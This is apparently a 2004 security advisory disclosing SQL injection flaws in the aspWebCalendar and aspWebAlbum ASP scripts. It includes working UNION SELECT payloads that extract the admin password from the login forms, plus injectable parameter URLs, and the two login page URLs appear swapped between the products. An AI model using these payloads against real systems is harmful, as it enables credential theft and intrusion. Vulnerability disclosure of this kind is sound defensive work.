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aspWebCalendar /aspWebAlbum: SQL injection

Subject: aspWebCalendar /aspWebAlbum: SQL injection
Date: 23 Sep 2004 18:27:02 -0000


[1]Introduction

"aspWebCalendar is an .asp (Active Server Pages) script that allows you to 
easily create an online events calendar that supports multiple users. Easy 
installation and usage are the key features of aspWebCalendar. The script 
contains a text file with a few configuration variables that are used by the 
script... Just change one of these variables, upload the files and you are up 
and running."

"aspWebAlbum is an .asp (Active Server Pages) script that allows you to easily 
create an online photo album or gallery simply by uploading images to your 
server... the script will do the rest. Easy installation and usage are the key 
features of aspWebAlbum. The script contains a text file with several 
configuration variables that are used by the script... just change two of these 
and you are up and running. To add images simply upload them to your server, 
its that simple."

This information was taken from http://www.jancw.dk/ but the vendor of this 
software is Full Revolution and the website can be found at 
www.fullrevolution.com


[2]The Problem

These two can run on SQL or Access databases, both coming right from the box, 
and those who use the default sql file are vulnerable to injection, alowing, 
f.e., an attacker to view the table contents by reading the asp error messages. 

(1) For the aspWebCalendar, in the login pages: 

"www.example.com/album.asp?action=login"

you can put this in the username field (leaving the password blank) to extract 
the password for the 'admin' user, if it exists:

"  ' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where 
Cal_User_UserName = 'admin'--  "

 
  (1.1) the 'eventid' field is vulnerable to sql injection too:
        "www.example.com/calendar.asp?action=eventdetail&eventid='"



(2) For the aspWebAlbum, the login pages can be found at 
"www.example.com/calendar.asp?action=login" and the problem is the same (i'll 
use the same example as above) :

        "' union select Gal_UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from 
Gal_Users where Gal_UserUserName = 'admin' --"

        
        (2.2) The 'cat' field is also a problem in this example:
             "www.example.com/album.asp?cat='"


At the moment all the SQL versions of this software seem to be affected.


[3]Timeline

(28/8/2004) vuln discovered
(29/8/2004) short note posted at johnny.ihackstuff.com forums
(15/9/2004) vendor notified, still no reply


[4]Feedback

cybercide@megamail.pt

(This is my first vulnerability disclosure so if there's a mistake here don't 
hurt me too much :-) )

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